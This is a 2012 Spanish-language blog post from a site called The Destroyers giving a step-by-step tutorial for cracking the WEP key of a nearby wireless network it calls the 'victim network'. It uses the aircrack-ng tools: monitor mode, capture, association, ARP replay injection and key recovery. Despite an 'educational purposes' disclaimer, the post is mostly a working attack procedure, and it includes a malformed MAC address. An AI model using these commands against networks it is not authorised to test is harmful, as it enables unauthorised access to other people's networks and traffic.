The Destroyers Buscar:

Usuarios Online

21 de octubre de 2012

TUTORIAL HACKEAR WIFI WPE --- BACKTRACK5 R1

Aqui otra vez con un Tutorial hacer auditoría de Redes inalámbricas con cifrado wep en 5 minutos más o menos; usando Backtrack 5 R1 Gnome.

"Este Post es con Fines Educativos y/o Didácticos, No me Hago Responsable del Uso Malicioso"


PASOS:

*Lo Primero es saber el nombre de nuestra interface (Targeta Wireless) para ponerla en Modo Monitor, para esto abrimos una Terminal y escribimos lo siguiente:

airmon-ng

Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el 
nombre de la interfaz es Wlan0 1* Ya qué conocemos el nombre de nuestra interfaz procedemos a ponerla en Modo Monitor y escribimos lo siguiente:

airmon-ng start wlan0

Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) y como se podrán dar cuenta "mon0" es el nombre de la interfaz en modo monitor.


2* Ahora vamos a escanear redes disponibles con el siguiente comando:

airodump-ng mon0

y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c 


3* En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando:

airodump-ng -w redes -c 11 --bssid 
00:22:A4:30E:59
 mon0donde

    -w = especifica el nombre del archivo donde se guarda la captura de datos
    -c = especifica el canal de la Red
--bssid = especifica Mac de Punto de Acceso
 mon0 = especifica la interfaz de la targeta de Red en Modo Monitor4* Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente:

aireplay-ng -1 0 -a 
00:22:A4:30E:59 mon0

esto es para Asociar su pc con la Red Víctima


5* Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente: 

aireplay-ng -3 -b 00:22:A4:30E:59 mon0

con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 datos para poder desemcriptar la Clave


6* Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando:

aircrack-ng redes-01.cap


redes = archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 3*


damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada


Key Found¡ (09:86:23:47:63) 


---comenta si te ha servido!!
---Encuentranos en Facebook como: https://www.facebook.com/destroyerweb

No hay comentarios:

Publicar un comentario